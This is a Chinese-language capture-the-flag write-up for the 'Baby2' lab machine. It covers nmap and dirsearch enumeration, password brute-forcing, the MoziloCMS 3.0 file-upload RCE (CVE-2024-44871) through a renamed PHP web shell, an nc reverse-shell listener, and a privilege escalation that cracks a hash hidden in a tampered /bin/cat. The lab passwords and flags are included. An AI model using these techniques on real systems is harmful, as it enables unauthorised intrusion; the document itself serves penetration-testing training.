Baby2

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00046s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00041s latency).
MAC Address: 08:00:27:05:42:68 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.22
Host is up (0.00062s latency).
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

靶机IP：192.168.2.22

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.22                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:55 CST
Nmap scan report for 192.168.2.22
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds

开放端口：22和80

2.详细信息扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:56 CST
Nmap scan report for 192.168.2.22
Host is up (0.0019s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

二、WEB渗透

1、信息泄露

访问80端口，查看页面源码，找到提示信息

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.22                                                                    
index
<!-- The new password does not comply with the rules (at least 8 characters, small and large letters and numbers). -->
<!-- Admin***  -->

提示：当前的密码不符合要求，并给出当前密码的提示为：Admin***，不知道后面三位字符

2、目录扫描

根据上面的信息，应该是存在登录界面的，尝试进行目录扫描，找到登录界面

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.22"
....
[16:02:05] 200 -    2KB - /wordpress/
....

找到一个路径wordpress，访问发现是moziloCMS

再次对/wordpress进行目录扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.22/wordpress"
....
[16:03:18] 200 -    0B  - /wordpress/admin/admin.php
[16:03:19] 200 -    0B  - /wordpress/admin/config.php
[16:03:19] 200 -   11KB - /wordpress/admin/
[16:03:19] 200 -    0B  - /wordpress/admin/files.php
[16:03:19] 200 -    0B  - /wordpress/admin/home.php
[16:03:20] 200 -    0B  - /wordpress/admin/login.php
[16:03:20] 200 -   11KB - /wordpress/admin/index.php
[16:03:37] 301 -  320B  - /wordpress/cms  ->  http://192.168.2.22/wordpress/cms/
[16:03:38] 200 -  832B  - /wordpress/cms/
[16:03:54] 200 -    2KB - /wordpress/install.php
[16:03:55] 200 -    2KB - /wordpress/install.php?profile=default
[16:03:57] 200 -  502B  - /wordpress/layouts/
[16:04:13] 301 -  324B  - /wordpress/plugins  ->  http://192.168.2.22/wordpress/plugins/
[16:04:14] 200 -  534B  - /wordpress/plugins/
[16:04:17] 200 -    3KB - /wordpress/README.md
[16:04:17] 200 -  360B  - /wordpress/readme.txt
[16:04:19] 200 -  114B  - /wordpress/robots.txt
[16:04:24] 200 -  300B  - /wordpress/sitemap.xml
[16:04:31] 301 -  320B  - /wordpress/tmp  ->  http://192.168.2.22/wordpress/tmp/
[16:04:32] 200 -  485B  - /wordpress/tmp/
[16:04:33] 200 -    0B  - /wordpress/update.php
....

找到登录界面的路径/wordpress/admin

3、密码爆破

可以使用burpsuite对登录密码Admin***的后三位进行爆破，成功爆破出密码为Admin123

三、MoziloCMS 3.0-RCE（CVE-2024-44871）

利用步骤：

1. Login as admin
2. Go to the Files session by the left menu
3. Create a .jpg file with it content having a php web shell
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access webshell via this endpoint :
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php

根据步骤上传一个反弹shell，成功获取到shell

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.22] 42170
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取aristore权限

查看user.txt

www-data@Baby2:/home/aristore$ ls -la user.txt 
-rw-r--r-- 1 root root 70 Oct 13 06:01 user.txt
www-data@Baby2:/home/aristore$ cat user.txt 
flag{fake-flag}

发现文件大小和实际读取出来的内容不一样，尝试反着读取

www-data@Baby2:/home/aristore$ tac user.txt 
aristore:aristorearistore
flag{user-b6cc0757c4a3108795d0803f9e82b9d3}

成功找到aristore的密码aristorearistore，进行连接

www-data@Baby2:/home/aristore$ su aristore
Password: 
aristore@Baby2:~$ id
uid=1000(aristore) gid=1000(aristore) groups=1000(aristore)

2、cat被篡改

使用dpkg -V查看软件包

aristore@Baby2:~$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5??????   /bin/cat
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue

发现存在一个/bin/cat

查看当前使用的cat

aristore@Baby2:~$ which cat
/usr/bin/cat

查看/bin/cat

aristore@Baby2:~$ strings /bin/cat
#!/bin/bash
[[ "$1" == user.txt ]] && echo "flag{fake-flag}" && exit 1
/usr/bin/cat2 "$@"
# b4b8daf4b8ea9d39568719e1e320076f

找到一个哈希值`b4b8daf4b8ea9d39568719e1e320076f

尝试解密，找到密码为rootroot

3、获取root权限

使用获取到的密码进行登录

aristore@Baby2:~$ su root
Password: 
root@Baby2:/home/aristore# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

root@Baby2:/home/aristore# cat /home/aristore/user.txt /root/root.txt 
flag{user-b6cc0757c4a3108795d0803f9e82b9d3}
aristore:aristorearistore
flag{root-9741bedefe0f692a60ace05be4311fe5}